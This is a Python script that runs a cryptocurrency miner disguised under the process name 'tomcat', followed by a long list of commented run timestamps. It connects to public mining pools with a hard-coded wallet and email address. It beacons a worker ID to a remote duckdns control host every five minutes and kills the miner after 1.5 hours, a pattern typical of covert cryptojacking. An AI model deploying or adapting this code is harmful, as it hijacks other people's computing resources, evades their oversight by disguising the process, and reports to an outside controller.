import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:07.601873
#2018-02-17 17:20:08.318262
#2018-02-17 19:08:07.101940
#2018-02-17 20:58:05.139893
#2018-02-17 22:44:01.640657
#2018-02-18 00:28:07.599954
#2018-02-18 02:19:03.705472
#2018-02-18 04:06:07.886406
#2018-02-18 05:57:02.172766
#2018-02-18 07:48:05.328120
#2018-02-18 09:36:01.247801
#2018-02-18 11:22:06.481790
#2018-02-18 13:08:03.804832
#2018-02-18 14:56:04.081566
#2018-02-18 16:44:04.593076
#2018-02-18 18:33:06.120161
#2018-02-18 20:21:06.910050
#2018-02-18 22:07:03.961901
#2018-02-18 23:55:01.657877
#2018-02-19 01:41:06.899172
#2018-02-19 03:29:05.576760
#2018-02-19 05:15:05.466095
#2018-02-19 07:02:01.958749
#2018-02-19 08:49:05.228360
#2018-02-19 10:39:01.600831
#2018-02-19 12:26:05.853231
#2018-02-19 14:13:08.167306
#2018-02-19 16:04:06.022464
#2018-02-19 17:53:07.175561
#2018-02-19 19:40:04.747396
#2018-02-19 21:27:05.650246
#2018-02-19 23:12:08.030444
#2018-02-20 00:59:03.978107
#2018-02-20 02:49:08.054330
#2018-02-20 04:36:04.219724
#2018-02-20 06:20:08.687716
#2018-02-20 08:05:05.736015
#2018-02-20 09:50:05.522327
#2018-02-20 11:34:04.719036
#2018-02-20 13:22:06.110142
#2018-02-20 15:08:01.324908
#2018-02-20 16:52:01.375761
#2018-02-20 18:39:07.308191
#2018-02-20 20:31:08.948049
#2018-02-20 22:16:01.505346
#2018-02-20 23:57:07.897537
#2018-02-21 01:42:08.165194
#2018-02-21 03:30:01.428448
#2018-02-21 05:18:04.514559
#2018-02-21 07:06:03.771365
#2018-02-21 08:51:07.909558
#2018-02-21 10:39:08.402761
#2018-02-21 12:26:07.721901
#2018-02-21 14:12:08.680063
#2018-02-21 15:58:01.653040
#2018-02-21 17:49:01.647309
#2018-02-21 19:34:02.151666
#2018-02-21 21:21:08.247307
#2018-02-21 23:09:07.700305
#2018-02-22 00:59:01.512429
#2018-02-22 02:47:06.324949
#2018-02-22 04:34:06.021056
#2018-02-22 06:19:04.956873
#2018-02-22 08:06:08.238055
#2018-02-22 09:53:08.509773
#2018-02-22 11:37:01.967297
#2018-02-22 13:24:07.241217
#2018-02-22 15:12:05.886729
#2018-02-22 16:56:08.104395
#2018-02-22 18:46:03.977183
#2018-02-22 20:37:05.612546
#2018-02-22 22:21:06.868836
#2018-02-23 00:08:05.516313
#2018-02-23 01:56:07.965164
#2018-02-23 03:45:09.664744
#2018-02-23 05:37:07.153057
#2018-02-23 07:23:06.694359
#2018-02-23 09:28:06.879040
#2018-02-23 11:33:05.092434
#2018-02-23 13:22:06.898845
#2018-02-23 15:07:01.952050
#2018-02-23 16:57:01.777243
#2018-02-23 18:46:08.918087
#2018-02-23 20:33:06.615935
#2018-02-23 22:21:08.203306
#2018-02-24 00:07:06.415770
#2018-02-24 01:57:05.558889
#2018-02-24 03:49:07.466896
#2018-02-24 05:35:06.696534
#2018-02-24 07:21:03.846290
#2018-02-24 09:11:05.157764
#2018-02-24 11:07:04.518262
#2018-02-24 12:55:07.182648
#2018-02-24 14:44:07.145626
#2018-02-24 16:36:04.613758
#2018-02-24 18:24:06.579174
#2018-02-24 20:11:05.694021
#2018-02-24 21:55:06.758428
#2018-02-25 00:55:08.678412
#2018-02-25 04:42:01.911177
#2018-02-25 08:39:01.257426